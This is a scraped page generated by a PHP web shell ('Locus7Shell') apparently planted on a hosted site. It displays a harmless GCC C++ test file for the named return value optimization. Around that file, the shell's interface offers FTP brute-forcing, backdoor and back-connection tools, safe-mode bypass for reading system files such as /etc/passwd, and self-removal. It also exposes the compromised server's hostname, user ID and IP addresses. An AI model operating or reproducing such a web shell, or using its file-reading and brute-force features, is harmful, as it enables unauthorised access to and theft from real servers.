Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/g++.dg/opt/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     nrv5.C (883 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// PR c++/7279
// Test for the named return value optimization with inlining.
// Contributed by Jakub Jelinek <jakub@redhat.com>.
// { dg-do run }
// { dg-options -O2 }

enum E { E0, E1, E2, E3 };

struct S
{
  E s0 : 2;
  bool s1 : 1, s2 : 1, s3 : 1, s4 : 1, s5 : 1, s6 : 1;
  S ();
  void foo (E x);
};

S::S() : s1 (true), s2 (false), s0 (E1), s3 (true), s4 (false),
     s5 (true), s6 (false) {}
void S::foo (E x) { this->s0 = x; }

inline S foo ()
{
  S s;
  s.foo (E0);
  return s;
}

inline S bar ()
{
  S s;
  s.foo (E2);
  return s;
}

void check (S &s, bool isfoo);

void test (bool isfoo)
{
  S a = isfoo ? foo () : bar ();
  check (a, isfoo);
}

extern "C" void abort ();

void check (S &s, bool isfoo)
{
  if (! s.s1 || s.s2 || ! s.s3 || s.s4 || ! s.s5 || s.s6)
    abort ();
  if (s.s0 != (isfoo ? E0 : E2))
    abort ();
}

int main ()
{
  test (true);
  test (false);
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0063 ]--